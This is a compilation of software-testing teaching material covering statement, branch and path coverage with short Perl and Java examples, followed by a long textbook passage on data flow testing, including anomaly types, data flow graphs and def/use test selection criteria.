$h = 0;
if ($x) {
    $h = { a => 1 };
}
if ($y) {
    print $h->{a};
}

100% branch coverage can be achieved by setting ($x, $y) to (1, 1) and then to (0, 0). But if we have (0, 1), then $h->{a} is dereferenced while $h is still 0, and things go bang.

The purpose of path coverage is to ensure that all paths through the program are taken. In any reasonably sized program there will be an enormous number of paths through the program and so in practice the paths can be limited to those within a single subroutine, if the subroutine is not too big, or simply to two consecutive branches.

In the above example there are four paths which correspond to the truth table for $x and $y. To achieve 100% path coverage they must all be taken. Note that missing elses count as paths.

In some cases it may be impossible to achieve 100% path coverage:

a if $x;
b;
c if $x;

50% path coverage is the best you can get here. Ideally, the code coverage tool you are using will recognize this and not complain about it, but unfortunately we do not live in an ideal world. And anyway, solving this problem in the general case requires a solution to the halting problem, and I couldn't find a module on CPAN for that.

Loops also contribute to paths, and pose their own problems which I'll ignore for now.

100% path coverage implies 100% branch coverage.

Statement coverage vs. branch coverage vs. path coverage

This post is for those who would like to prepare for the ISTQB exam and have difficulty understanding the difference between the various types of coverage. Let's consider the following piece of code:

public int returnInput(int input, boolean condition1, boolean condition2, boolean condition3) {
    int x = input;
    int y = 0;
    if (condition1)
        x++;
    if (condition2)
        x--;
    if (condition3)
        y = x;
    return y;
}

Statement coverage

In order to execute every statement we need only one test case, which sets all conditions to true; every line of code (statement) is then touched.

shouldReturnInput(x, true, true, true) - 100% of statements covered

But only half of the branches are covered, and only one path.

Branch coverage

You can visualize every if-statement as two branches (a true-branch and a false-branch). It can clearly be seen that the above test case follows only the true-branches of every if-statement, so only 50% of the branches are covered. In order to cover 100% of the branches we would need to add the following test case:

shouldReturnInput(x, false, false, false)

With these two test cases we have 100% of statements covered and 100% of branches covered.

Path coverage

Nevertheless, there is still the concept of path coverage. In order to understand path coverage it is good to visualize the above code in the form of a binary tree.


As you can probably see, the above two test cases cover only two paths, t-t-t and f-f-f, while in fact there are 8 separate paths (through conditions 1-2-3):

t-t-t - covered by test case 1
t-t-f
t-f-t
t-f-f
f-t-t
f-t-f
f-f-t
f-f-f - covered by test case 2


Data flow graph

What is Data Flow Testing?

Data flow testing is a family of test strategies based on selecting paths through the program's control flow in order to explore sequences of events related to the status of variables or data objects. Dataflow Testing focuses on the points at which variables receive values and the points at which these values are used.

Advantages of Data Flow Testing:

Data flow testing helps us to pinpoint any of the following issues (a small sketch follows the list):

• A variable that is declared but never used within the program.
• A variable that is used but never declared.
• A variable that is defined multiple times before it is used.
• A variable that is deallocated before it is used.
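A small C sketch (invented for illustration) of the first and third issues; a data flow analysis would flag both commented lines:

/* Hypothetical fragment containing data flow anomalies. */
int anomalies(int input)
{
    int unused = 5;   /* defined but never used                    */
    int x;
    x = 1;            /* defined ...                               */
    x = 2;            /* ... and defined again before any use (dd) */
    return input + x;
}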

Meaning of data flow

Data flow is an abstract representation of the sequence and possible changes of state of data objects, where the state of an object is one of: creation (created), usage (used or modified), or destruction (killed). Data flow structure follows the trail of a data item as it is accessed and modified by the code. Using data flow, one can understand how the data act as they are transformed by the program, and defects such as referencing a variable with an undefined value, or variables that are never used, can be identified.

Data flow testing

Data flow testing strategies are a family of test strategies that track a program's control flow in order to explore sequences of events related to the status of data objects caused by their creation, usage, modification, or destruction, with the intention of identifying data anomalies.

Data flow testing is a technique used to detect improper use of data in a program. By looking at data usage, risky areas of code can be found and more test cases can be applied. To test data flow we devise a control flow graph. A data-flow graph (DFG) is a graph which represents data dependencies between a number of operations.


Data Flow Testing

5.1 GENERAL IDEA

A program unit, such as a function, accepts input values, performs computations while assigning new values to local and global variables, and, finally, produces output values. Therefore, one can imagine a kind of "flow" of data values between variables along a path of program execution. A data value computed in a certain step of program execution is expected to be used in a later step. For example, a program may open a file, thereby obtaining a value for a file pointer; in a later step, the file pointer is expected to be used. Intuitively, if the later use of the file pointer is never verified, then we do not know whether or not the earlier assignment of value to the file pointer variable is all right. Sometimes, a variable may be defined twice without a use of the variable in between. One may wonder why the first definition of the variable is never used. There are two motivations for data flow testing, as follows. First, a memory location corresponding to a program variable should be accessed in a desirable way. For example, a memory location may not be read before writing into the location. Second, it is desirable to verify the correctness of a data value generated for a variable; this is performed by observing that all the uses of the value produce the desired results.

The above basic idea about data flow testing tells us that a programmer can perform a number of tests on data values, which are collectively known as data flow testing. Data flow testing can be performed at two conceptual levels: static data flow testing and dynamic data flow testing. As the name suggests, static data flow testing is performed by analyzing the source code, and it does not involve actual execution of the source code. Static data flow testing is performed to reveal potential defects in programs. The potential program defects are commonly known as data flow anomalies. On the other hand, dynamic data flow testing involves identifying program paths from source code based on a class of data flow testing criteria.

(Source: Software Testing and Quality Assurance: Theory and Practice, edited by Kshirasagar Naik and Priyadarshi Tripathy. Copyright © 2008 John Wiley & Sons, Inc.)

The reader may note that there is much similarity between control flow testing and data flow testing. Moreover, there is a key difference between the two approaches. The similarities stem from the fact that both approaches identify program paths and emphasize generating test cases from those program paths. The difference between the two lies in the fact that control flow test selection criteria are used in the former, whereas data flow test selection criteria are used in the latter approach.

In this chapter, first we study the concept of data flow anomaly as identified by Fosdick and Osterweil [1]. Next, we discuss dynamic data flow testing in detail.

5.2 DATA FLOW ANOMALY

An anomaly is a deviant or abnormal way of doing something. For example, it is an abnormal situation to successively assign two values to a variable without using the first value. Similarly, it is abnormal to use a value of a variable before assigning a value to the variable. Another abnormal situation is to generate a data value and never use it. In the following, we explain three types of abnormal situations concerning the generation and use of data values. The three abnormal situations are called type 1, type 2, and type 3 anomalies [1]. These anomalies could be manifestations of potential programming errors. We will explain why program anomalies need not lead to program failures.

Defined and Then Defined Again (Type 1): Consider the partial sequence of computations shown in Figure 5.1, where f1(y) and f2(z) denote functions with the inputs y and z, respectively. We can interpret the two statements in Figure 5.1 in several ways as follows:

• The computation performed by the first statement is redundant if the second statement performs the intended computation.

• The first statement has a fault. For example, the intended first computation might be w = f1(y).

• The second statement has a fault. For example, the intended second computation might be v = f2(z).

• A fourth kind of fault can be present in the given sequence in the form of a missing statement between the two. For example, v = f3(x) may be the desired statement that should go in between the two given statements.

x = f1(y)
x = f2(z)

Figure 5.1 Sequence of computations showing data flow anomaly.



It is for the programmer to make the desired interpretation, though one can interpret the given two statements in several ways. However, it can be said that there is a data flow anomaly in those two statements, indicating that they need to be examined to eliminate any confusion in the mind of a code reader.

Undefined but Referenced (Type 2): A second form of data flow anomaly is to use an undefined variable in a computation, such as x = x - y - w, where the variable w has not been initialized by the programmer. Here, too, one may argue that though w has not been initialized, the programmer intended to use another initialized variable, say y, in place of w. Whatever may be the real intention of the programmer, there exists an anomaly in the use of the variable w, and one must eliminate the anomaly either by initializing w or by replacing w with the intended variable.

Defined but Not Referenced (Type 3): A third kind of data flow anomaly is to define a variable and then to undefine it without using it in any subsequent computation. For example, consider the statement x = f(x, y) in which a new value is assigned to the variable x. If the value of x is not used in any subsequent computation, then we should be suspicious of the computation represented by x = f(x, y). Hence, this form of anomaly is called "defined but not referenced."

Huang [2] introduced the idea of "states" of program variables to identify data flow anomalies. For example, initially, a variable can remain in an "undefined" (U) state, meaning that just a memory location has been allocated to the variable but no value has yet been assigned. At a later time, the programmer can perform a computation to define (d) the variable in the form of assigning a value to the variable; this is when the variable moves to a "defined but not referenced" (D) state. At a later time, the programmer can reference (r), that is, read, the value of the variable, thereby moving the variable to a "defined and referenced" state (R). The variable remains in the R state as long as the programmer keeps referencing the value of the variable. If the programmer assigns a new value to the variable, the variable moves back to the D state. On the other hand, the programmer can take an action to undefine (u) the variable. For example, if an opened file is closed, the value of the file pointer is no longer recognized by the underlying operating system, and therefore the file pointer becomes undefined. The above scenarios describe the normal actions on variables and are illustrated in Figure 5.2.

However, programmers can make mistakes by taking the wrong actions while a variable is in a certain state. For example, if a variable is in the state U (that is, the variable is still undefined) and a programmer reads (r) the variable, then the variable moves to an abnormal (A) state. The abnormal state of a variable means that a programming anomaly has occurred. Similarly, while a variable is in the state D and the programmer undefines (u) the variable or redefines (d) the variable, the variable moves to the abnormal (A) state. Once a variable enters the abnormal state, it remains in that state irrespective of what action (d, u, or r) is taken. The actions that take a variable from a desired state, such as U or D, to an abnormal state are illustrated in Figure 5.2.



Figure 5.2 State transition diagram of a program variable. (From ref. 2. © 1979 IEEE.) [Diagram omitted; legend: states U = undefined, D = defined but not referenced, R = defined and referenced, A = abnormal; actions d = define, r = reference, u = undefine.]

Now it is useful to make an association between the type 1, type 2, and type 3 anomalies and the state transition diagram shown in Figure 5.2. The type 1, type 2, and type 3 anomalies are denoted by the action sequences dd, ur, and du, respectively, in Figure 5.2.

Data flow anomalies can be detected by using the idea of program instrumentation. Intuitively, program instrumentation means incorporating additional code in a program to monitor its execution status. For example, we can write additional code in a program to monitor the sequence of states, namely U, D, R, and A, traversed by a variable. If the state sequence contains the dd, ur, or du subsequence, then a data flow anomaly is said to have occurred.
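As a minimal sketch of this idea, the following C fragment (names invented; not from the text) instruments a single monitored variable with the state machine of Figure 5.2 and reports when a dd, ur, or du subsequence drives it into the abnormal state:

#include <stdio.h>

/* States from Figure 5.2: U = undefined, D = defined but not referenced,
   R = defined and referenced, A = abnormal. */
typedef enum { U, D, R, A } State;

static State state = U;

/* Apply one action (d, r, or u) and report anomalous transitions. */
static void action(char a)
{
    switch (state) {
    case U:
        if (a == 'd') state = D;
        else if (a == 'r') state = A;  /* ur: type 2 anomaly */
        break;                         /* 'u' in U: treated here as staying in U */
    case D:
        if (a == 'r') state = R;
        else state = A;                /* dd (type 1) or du (type 3) anomaly */
        break;
    case R:
        if (a == 'd') state = D;
        else if (a == 'u') state = U;
        break;                         /* another r keeps the variable in R */
    case A:
        break;                         /* A is absorbing */
    }
    if (state == A)
        printf("data flow anomaly detected after action '%c'\n", a);
}

int main(void)
{
    action('d');
    action('d');   /* dd subsequence: flags a type 1 anomaly */
    return 0;
}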

The presence of a data flow anomaly in a program does not necessarily mean that execution of the program will result in a failure. A data flow anomaly simply means that the program may fail, and therefore the programmer must investigate the cause of the anomaly. Let us consider the dd anomaly shown in Figure 5.1. If the real intention of the programmer was to perform the second computation and the first computation produces no side effect, then the first computation merely represents a waste of processing power. Thus, the said dd anomaly will not lead to program failure. On the other hand, if a statement is missing in between the two statements, then the program can possibly lead to a failure. Programmers must analyze the causes of data flow anomalies and eliminate them.

5.3 OVERVIEW OF DYNAMIC DATA FLOW TESTING

In the process of writing code, a programmer manipulates variables in order to achieve the desired computational effect. Variable manipulation occurs in several ways, such as initialization of the variable, assignment of a new value to the variable, computing a value of another variable using the value of the variable, and controlling the flow of program execution.

Rapps and Weyuker [3] convincingly tell us that one should not feel confident that a variable has been assigned the correct value if no test case causes the execution of a path from the assignment to a point where the value of the variable is used. In the above motivation for data flow testing, (i) assignment of a correct value means whether or not a value for the variable has been correctly generated, and (ii) use of a variable refers to further generation of values for the same or other variables and/or control of flow. A variable can be used in a predicate, that is, a condition, to choose an appropriate flow of control.

The above idea gives us an indication of the involvement of certain kinds of program paths in data flow testing. Data flow testing involves selecting entry–exit paths with the objective of covering certain data definition and use patterns, commonly known as data flow testing criteria. Specifically, certain program paths are selected on the basis of data flow testing criteria. Following the general ideas in control flow testing that we discussed in Chapter 4, we give an outline of performing data flow testing in the following:

• Draw a data flow graph from a program.

• Select one or more data flow testing criteria.

• Identify paths in the data flow graph satisfying the selection criteria.

• Derive path predicate expressions from the selected paths and solve those expressions to derive test input.

The reader may recall that the process of deriving a path predicate expression from a path has been explained in Chapter 4. The same idea applies to deriving a path predicate expression from a path obtained from a data flow graph. Therefore, in the rest of this chapter we will explain a procedure for drawing a data flow graph from a program unit and discuss data flow testing criteria.

5.4 DATA FLOW GRAPH

In this section, we explain the main ideas in a data flow graph and a method to draw it. In practice, programmers may not draw data flow graphs by hand. Instead, language translators are modified to produce data flow graphs from program units. A data flow graph is drawn with the objective of identifying data definitions and their uses as motivated in the preceding section. Each occurrence of a data variable is classified as follows:

Definition: This occurs when a value is moved into the memory location of the variable. Referring to the C function VarTypes() in Figure 5.3, the assignment statement i = x; is an example of a definition of the variable i.

Undefinition or Kill: This occurs when the value and the location become unbound. Referring to the C function VarTypes() in Figure 5.3, the first

iptr = malloc(sizeof(int));

statement initializes the integer pointer variable iptr, and

*iptr = i + x;

initializes the value of the location pointed to by iptr. The second

iptr = malloc(sizeof(int));

statement redefines variable iptr, thereby undefining the location previously pointed to by iptr.

int VarTypes(int x, int y)
{
    int i;
    int *iptr;
    i = x;
    iptr = malloc(sizeof(int));
    *iptr = i + x;
    if (*iptr > y)
        return (x);
    else {
        iptr = malloc(sizeof(int));
        *iptr = x + y;
        return (*iptr);
    }
}

Figure 5.3 Definition and uses of variables.

Use: This occurs when the value is fetched from the memory location of the variable. There are two forms of uses of a variable, as explained below.

• Computation use (c-use): This directly affects the computation being performed. In a c-use, a potentially new value of another variable or of the same variable is produced. Referring to the C function VarTypes(), the statement

*iptr = i + x;

gives examples of c-use of variables i and x.

• Predicate use (p-use): This refers to the use of a variable in a predicate controlling the flow of execution. Referring to the C function VarTypes(), the statement

if (*iptr > y) ...

gives examples of p-use of variables y and iptr.

A data flow graph is a directed graph constructed as follows:

• A sequence of definitions and c-uses is associated with each node of the graph.

• A set of p-uses is associated with each edge of the graph.



• The entry node has a definition of each parameter and each nonlocal variable which occurs in the subprogram.

• The exit node has an undefinition of each local variable.

Example: We show the data flow graph in Figure 5.4 for the ReturnAverage() example discussed in Chapter 4. The initial node, node 1, represents initialization of the input vector <value, AS, MIN, MAX>. Node 2 represents the initialization of the four local variables i, ti, tv, and sum in the routine. Next we introduce a NULL node, node 3, keeping in mind that control will come back to the beginning of the while loop. Node 3 also denotes the fact that program control exits from the while loop at the NULL node. The statement ti++ is represented by node 4. The predicate associated with edge (3, 4) is the condition part of the while loop, namely,

((ti < AS) && (value[i] != -999))

Statements tv++ and sum = sum + value[i] are represented by node 5. Therefore, the condition part of the first if statement forms the predicate associated with edge (4, 5), namely,

((value[i] >= MIN) && (value[i] <= MAX))

Figure 5.4 Data flow graph of ReturnAverage() example. [Diagram omitted; nodes: 1 initialize value[], AS, MIN, MAX; 2 i = 0, ti = 0, tv = 0, sum = 0; 3 NULL; 4 ti++; 5 tv++, sum = sum + value[i]; 6 i++; 7 NULL; 8 av = (double)-999; 9 av = (double)sum/tv; 10 return(av).]

The statement i++ is represented by node 6. The predicate associated with edge (4, 6) is the negation of the condition part of the if statement, namely,

~((value[i] >= MIN) && (value[i] <= MAX))

The predicate associated with edge (5, 6) is true because there is an unconditional flow of control from node 5 to node 6. Execution of the while loop terminates when its condition evaluates to false. Therefore, the predicate associated with edge (3, 7) is the negation of the predicate associated with edge (3, 4), namely,

~((ti < AS) && (value[i] != -999))

It may be noted that there is no computation performed in a NULL node. Referring to the second if statement, av = (double)-999 is represented by node 8, and av = (double)sum/tv is represented by node 9. Therefore, the predicate associated with edge (7, 9) is

(tv > 0),

and the predicate associated with edge (7, 8) is

~(tv > 0).

Finally, the return(av) statement is represented by node 10, and the predicate True is associated with both the edges (8, 10) and (9, 10).

5.5 DATA FLOW TERMS

A variable defined in a statement is used in another statement which may occur immediately or several statements after the definition. We are interested in finding paths that include pairs of definition and use of variables. In this section, we explain a family of path selection criteria that allow us to select paths with varying strength. The reader may note that for every feasible path we can generate a test case. In the following, first we explain a few terms, and then we explain a few selection criteria using those terms.

Global c-use: A c-use of a variable x in node i is said to be a global c-use if x has been defined before in a node other than node i.

Example: The c-use of variable tv in node 9 is a global c-use since tv has been defined in nodes 2 and 5 (Figure 5.4).

Definition Clear Path: A path (i - n1 - ... - nm - j), m >= 0, is called a definition clear path (def-clear path) with respect to variable x

• from node i to node j and

• from node i to edge (nm, j)

if x has been neither defined nor undefined in nodes n1, ..., nm. The reader may note that the definition of a def-clear path is unconcerned about the status of x in nodes i and j. Also, a def-clear path does not preclude loops. Therefore, the path 2-3-4-6-3-4-6-3-4-5, which includes a loop, is a def-clear path.

Example: The paths 2-3-4-5 and 2-3-4-6 are def-clear paths with respect to variable tv from node 2 to 5 and from node 2 to 6, respectively (Figure 5.4).

Global Definition: A node i has a global definition of a variable x if node i has a definition of x and there is a def-clear path with respect to x from node i to some

• node containing a global c-use of x or

• edge containing a p-use of x.

The reader may note that we do not define a global p-use of a variable similar to global c-use. This is because every p-use is associated with an edge, not a node.

In Table 5.1, we show all the global definitions and global c-uses appearing in the data flow graph of Figure 5.4; def(i) denotes the set of variables which have global definitions in node i. Similarly, c-use(i) denotes the set of variables which have global c-uses in node i. We show all the predicates and p-uses appearing in the data flow graph of Figure 5.4 in Table 5.2; predicate(i, j) denotes the predicate associated with edge (i, j) of the data flow graph in Figure 5.4; p-use(i, j) denotes the set of variables which have p-uses on edge (i, j).

Simple Path: A simple path is a path in which all nodes, except possibly the first and the last, are distinct.

TABLE 5.1 def() and c-use() Sets of Nodes in Figure 5.4

Node i   def(i)                    c-use(i)
1        {value, AS, MIN, MAX}     {}
2        {i, ti, tv, sum}          {}
3        {}                        {}
4        {ti}                      {ti}
5        {tv, sum}                 {tv, i, sum, value}
6        {i}                       {i}
7        {}                        {}
8        {av}                      {}
9        {av}                      {sum, tv}
10       {}                        {av}



TABLE 5.2 Predicates and p-use() Set of Edges in Figure 5.4

Edge (i, j)   predicate(i, j)                             p-use(i, j)
(1, 2)        True                                        {}
(2, 3)        True                                        {}
(3, 4)        (ti < AS) && (value[i] != -999)             {i, ti, AS, value}
(4, 5)        (value[i] >= MIN) && (value[i] <= MAX)      {i, MIN, MAX, value}
(4, 6)        ~((value[i] >= MIN) && (value[i] <= MAX))   {i, MIN, MAX, value}
(5, 6)        True                                        {}
(6, 3)        True                                        {}
(3, 7)        ~((ti < AS) && (value[i] != -999))          {i, ti, AS, value}
(7, 8)        ~(tv > 0)                                   {tv}
(7, 9)        (tv > 0)                                    {tv}
(8, 10)       True                                        {}
(9, 10)       True                                        {}

Example: Paths 2-3-4-5 and 3-4-6-3 are simple paths (Figure 5.4).

Loop-Free Path: A loop-free path is a path in which all nodes are distinct.

Complete Path: A complete path is a path from the entry node to the exit node.

Du-path: A path (n1 - n2 - ... - nj - nk) is a definition-use path (du-path) with respect to (w.r.t.) variable x if node n1 has a global definition of x and either

• node nk has a global c-use of x and (n1 - n2 - ... - nj - nk) is a def-clear simple path w.r.t. x, or

• edge (nj, nk) has a p-use of x and (n1 - n2 - ... - nj) is a def-clear, loop-free path w.r.t. x.

Example: Considering the global definition and global c-use of variable tv in nodes 2 and 5, respectively, 2-3-4-5 is a du-path.

Example: Considering the global definition of variable tv in node 2 and the p-use of tv on edge (7, 9), 2-3-7-9 is a du-path.

5.6 DATA FLOW TESTING CRITERIA

In this section, we explain seven types of data flow testing criteria. These criteria are based on two fundamental concepts, namely, definitions and uses (both c-uses and p-uses) of variables.

All-defs: For each variable x and for each node i such that x has a global definition in node i, select a complete path which includes a def-clear path from node i to

• node j having a global c-use of x or

• edge (j, k) having a p-use of x.

Example: Consider the variable tv, which has global definitions in nodes 2 and 5 (Figure 5.4 and Tables 5.1 and 5.2). First, we consider its global definition in node 2. We find a global c-use of tv in node 5, and there exists a def-clear path 2-3-4-5 from node 2 to node 5. We choose a complete path 1-2-3-4-5-6-3-7-9-10 that includes the def-clear path 2-3-4-5 to satisfy the all-defs criterion. We also find p-uses of variable tv on edge (7, 8), and there exists a def-clear path 2-3-7-8 from node 2 to edge (7, 8). We choose a complete path 1-2-3-7-8-10 that includes the def-clear path 2-3-7-8 to satisfy the all-defs criterion. Now we consider the definition of tv in node 5. In node 9 there is a global c-use of tv, and on edges (7, 8) and (7, 9) there are p-uses of tv. There is a def-clear path 5-6-3-7-9 from node 5 to node 9. Thus, we choose a complete path 1-2-3-4-5-6-3-7-9-10 that includes the def-clear path 5-6-3-7-9 to satisfy the all-defs criterion. The reader may note that the complete path 1-2-3-4-5-6-3-7-9-10 covers the all-defs criterion for variable tv defined in nodes 2 and 5. To satisfy the all-defs criterion, similar paths must be obtained for variables i, ti, and sum.

All-c-uses: For each variable x and for each node i such that x has a global definition in node i, select complete paths which include def-clear paths from node i to all nodes j such that there is a global c-use of x in j.

Example: Let us obtain paths to satisfy the all-c-uses criterion with respect to variable ti. We find two global definitions of ti in nodes 2 and 4. Corresponding to the global definition in node 2, there is a global c-use of ti in node 4. However, corresponding to the global definition in node 4, there is no global c-use of ti. From the global definition in node 2, there is a def-clear path to the global c-use in node 4 in the form of 2-3-4. The reader may note that there are four complete paths that include the def-clear path 2-3-4, as follows:

1-2-3-4-5-6-3-7-8-10,

1-2-3-4-5-6-3-7-9-10,

1-2-3-4-6-3-7-8-10, and

1-2-3-4-6-3-7-9-10.

One may choose one or more paths from among the four paths above to satisfy the all-c-uses criterion with respect to variable ti.

All-p-uses: For each variable x and for each node i such that x has a global definition in node i, select complete paths which include def-clear paths from node i to all edges (j, k) such that there is a p-use of x on edge (j, k).

Example: Let us obtain paths to satisfy the all-p-uses criterion with respect to variable tv. We find two global definitions of tv in nodes 2 and 5. Corresponding to the global definition in node 2, there is a p-use of tv on edges (7, 8) and (7, 9). There are def-clear paths from node 2 to edges (7, 8) and (7, 9), namely 2-3-7-8 and 2-3-7-9, respectively. Also, there are def-clear paths from node 5 to edges (7, 8) and (7, 9), namely 5-6-3-7-8 and 5-6-3-7-9, respectively. In the following, we identify four complete paths that include the above four def-clear paths:

1-2-3-7-8-10,

1-2-3-7-9-10,

1-2-3-4-5-6-3-7-8-10, and

1-2-3-4-5-6-3-7-9-10.

All-p-uses/Some-c-uses: This criterion is identical to the all-p-uses criterion except when a variable x has no p-use. If x has no p-use, then this criterion reduces to the some-c-uses criterion explained below.

Some-c-uses: For each variable x and for each node i such that x has a global definition in node i, select complete paths which include def-clear paths from node i to some nodes j such that there is a global c-use of x in node j.

Example: Let us obtain paths to satisfy the all-p-uses/some-c-uses criterion with respect to variable i. We find two global definitions of i in nodes 2 and 6. There is no p-use of i in Figure 5.4. Thus, we consider some c-uses of variable i. Corresponding to the global definition of variable i in node 2, there is a global c-use of i in node 6, and there is a def-clear path from node 2 to node 6 in the form of 2-3-4-5-6. Therefore, to satisfy the all-p-uses/some-c-uses criterion with respect to variable i, we select the complete path 1-2-3-4-5-6-3-7-9-10, which includes the def-clear path 2-3-4-5-6.

All-c-uses/Some-p-uses: This criterion is identical to the all-c-uses criterion except when a variable x has no global c-use. If x has no global c-use, then this criterion reduces to the some-p-uses criterion explained below.

Some-p-uses: For each variable x and for each node i such that x has a global definition in node i, select complete paths which include def-clear paths from node i to some edges (j, k) such that there is a p-use of x on edge (j, k).

Example: Let us obtain paths to satisfy the all-c-uses/some-p-uses criterion with respect to variable AS. We find just one global definition of AS, in node 1. There is no global c-use of AS in Figure 5.4. Thus, we consider some p-uses of AS. Corresponding to the global definition of AS in node 1, there are p-uses of AS on edges (3, 7) and (3, 4), and there are def-clear paths from node 1 to those two edges, namely 1-2-3-7 and 1-2-3-4, respectively. There are many complete paths that include those two def-clear paths. One such example path is 1-2-3-4-5-6-3-7-9-10.

All-uses: This criterion is the conjunction of the all-p-uses criterion and the all-c-uses criterion discussed above.

All-du-paths: For each variable x and for each node i such that x has a global definition in node i, select complete paths which include all du-paths from node i

• to all nodes j such that there is a global c-use of x in j and

• to all edges (j, k) such that there is a p-use of x on (j, k).

In Chapter 4, we explained a procedure to generate a test input from an entry–exit program path. There is much similarity between control flow–based testing and data flow–based testing. Their difference lies in the ways the two techniques select program paths.

5.7 COMPARISON OF DATA FLOW TEST SELECTION CRITERIA

Having seen a relatively large number of test selection criteria based on the concepts of data flow and control flow, it is useful to find relationships among them. Given a pair of test selection criteria, we should be able to compare the two. If we cannot compare them, we realize that they are incomparable. Rapps and Weyuker [3] defined the concept of an includes relationship to find out if, for a given pair of selection criteria, one includes the other. In the following, by a complete path we mean a path from the entry node of a flow graph to one of its exit nodes.

Definition: Given two test selection criteria c1 and c2, c1 includes c2 if for every def/use graph any set of complete paths of the graph that satisfies c1 also satisfies c2.

Definition: Given two test selection criteria c1 and c2, c1 strictly includes c2, denoted by c1 → c2, provided c1 includes c2 and for some def/use graph there is a set of complete paths of the graph that satisfies c2 but not c1.

It is easy to note that the "→" relationship is a transitive relation. Moreover, given two criteria c1 and c2, it is possible that neither c1 → c2 nor c2 → c1 holds, in which case we call the two criteria incomparable. Proving the strictly includes relationship or the incomparable relationship between two selection criteria in a programming language with arbitrary semantics may not be possible. Thus, to show the strictly includes relationship between a pair of selection criteria, Rapps and Weyuker [3] have considered a restricted programming language with the following syntax:

Start statement: start
Input statement: read x1, ..., xn, where x1, ..., xn are variables.
Assignment statement: y ← f(x1, ..., xn), where y and x1, ..., xn are variables, and f is a function.
Output statement: print e1, ..., en, where e1, ..., en are output values.
Unconditional transfer statement: goto m, where m is a label.
Conditional transfer statement: if p(x1, ..., xn), then goto m, where p is a predicate.
Halt statement: stop



Figure 5.5 Relationship among DF (data flow) testing criteria. (From ref. 4. © 1988 IEEE.) [Diagram omitted; it shows the strictly-includes hierarchy among All-paths, All-du-paths, All-uses, All-c-uses/Some-p-uses, All-p-uses/Some-c-uses, All-c-uses, All-p-uses, All-defs, All-branches, and All-statements.]

Frankl and Weyuker [4] have further extended the relationship; what they have proved is summarized in Figure 5.5. For example, the all-paths selection criterion strictly includes the all-du-paths criterion. Similarly, the all-c-uses/some-p-uses criterion strictly includes the all-defs criterion.

However, we cannot find a strictly includes relationship between the pair all-c-uses and all-p-uses. Let P^c_x be a set of paths selected by the all-c-uses criterion with respect to a variable x. We cannot say with certainty whether or not the path set P^c_x satisfies the all-p-uses criterion with respect to the same variable x. Similarly, let P^p_x be a set of paths selected by the all-p-uses criterion with respect to the variable x. We cannot say with certainty whether or not the path set P^p_x satisfies the all-c-uses criterion with respect to the same variable x. Thus, the two criteria all-c-uses and all-p-uses are incomparable.

Note the relationship between data flow–based test selection criteria and control flow–based test selection criteria, as shown in Figure 5.5. The two control flow–based test selection criteria in Figure 5.5 are all-branches and all-statements. The all-p-uses criterion strictly includes the all-branches criterion, which implies that one can select more paths from a data flow graph of a program unit than from its control flow graph.

5.8 FEASIBLE PATHS AND TEST SELECTION CRITERIA

Given a data flow graph, a path is a sequence of nodes and edges. A complete path is a sequence of nodes and edges starting from the initial node of the graph to one of its exit nodes. A complete path is executable if there exists an assignment of values to input variables and global variables such that all the path predicates evaluate to true, thereby making the path executable. Executable paths are also known as feasible paths. If no such assignment of values to input variables and global variables exists, then we call the path infeasible or inexecutable.

Since we are interested in selecting inputs to execute paths, we must ensure that a test selection criterion picks executable paths. Assume that we want to test a program by selecting paths to satisfy a certain selection criterion C. Let PC be the set of paths selected according to criterion C for a given program unit. As an extreme example, if all the paths in PC are infeasible, then the criterion C has not helped us in any way. For a criterion C to be useful, it must select a set of executable, or feasible, paths. Frankl and Weyuker [4] have modified the definitions of the test selection criteria so that each criterion selects only feasible paths. In other words, we modify the definition of criterion C to obtain a criterion C*, which selects only feasible paths; C* is called a feasible data flow (FDF) testing criterion. As an example, the criterion (All-c-uses)* is an adaptation of All-c-uses such that only feasible paths are selected by (All-c-uses)*, as defined below.

(All-c-uses)*: For each variable x and for each node i such that x has a global definition in node i, select feasible complete paths which include def-clear paths from node i to all nodes j such that there is a global c-use of x in j.

Thus, the test selection criteria (All-paths)*, (All-du-paths)*, (All-uses)*, (All-c-uses/Some-p-uses)*, (All-p-uses/Some-c-uses)*, (All-c-uses)*, (All-p-uses)*, (All-defs)*, (All-branches)*, and (All-statements)* choose only feasible paths, and, therefore, these are called feasible data flow (FDF) testing criteria. Frankl and Weyuker [4] have shown that the strictly includes relationships among test selection criteria, as shown in Figure 5.5, do not hold if the selection criteria choose only feasible paths. The new relationship among FDF test selection criteria is summarized in Figure 5.6. Though it is seemingly useful to select only feasible paths, and therefore to consider only the FDF test selection criteria, we are faced with a decidability problem: it is undecidable whether a given set of paths is executable. If we do not know the executability of a path, we cannot automate the application of an FDF test selection criterion. On the other hand, an ordinary data flow testing criterion may turn out to be inadequate if all its selected paths are infeasible. Consequently, a test engineer must make a choice between using a possibly inadequate selection criterion and one that cannot be completely automated.

Figure 5.6 Relationship among FDF (feasible data flow) testing criteria: (All-paths)*, (All-du-paths)*, (All-uses)*, (All-c-uses/Some-p-uses)*, (All-p-uses/Some-c-uses)*, (All-defs)*, (All-c-uses)*, (All-p-uses)*, (All-branches)*, and (All-statements)*. (From ref. 4. © 1988 IEEE.)

5.9 COMPARISON OF TESTING TECHNIQUES

So far we have discussed two major techniques for generating test data from source code, namely control flow–based path selection and data flow–based path selection. We also explained a few criteria to select paths from a control flow graph and a data flow graph of a program. Programmers often randomly select test data based on their own understanding of the code they have written. Therefore, it is natural to compare the effectiveness of the three test generation techniques, namely random test selection, test selection based on control flow, and test selection based on data flow. Comparing those techniques is not an easy task. An acceptable, straightforward way of comparing them is to apply those techniques to the same set of programs with known faults and express their effectiveness in terms of the following two metrics:

• Number of test cases produced

• Percentage of known faults detected

Ntafos [5] has reported on the results of an experiment comparing the effectiveness of three test selection techniques. The experiment involved seven mathematical programs with known faults. For the control flow–based technique, the branch coverage criterion was selected, whereas the all-uses criterion was chosen for data flow testing. Random testing was also applied to the programs. The data flow testing, branch testing, and random testing detected 90%, 85.5%, and 79.5%, respectively, of the known defects. A total of 84 test cases were designed to achieve all-uses coverage, 34 test cases were designed to achieve branch coverage, and 100 test cases were designed in the random testing approach. We interpret the experimental results as follows:

• A programmer can randomly generate a large number of test cases to find most of the faults. However, one will run out of test cases to find some of the remaining faults. Random testing is not ineffective, but it incurs a higher cost than the systematic techniques, namely, the control flow and the data flow techniques.

• Test selection based on branch coverage produces far fewer test cases than the random technique but achieves nearly the same level of fault detection. Thus, there is a significant saving in the cost of program testing.

• The all-uses testing criterion gives a programmer a new way to design more test cases and reveal more faults than the branch coverage criterion.

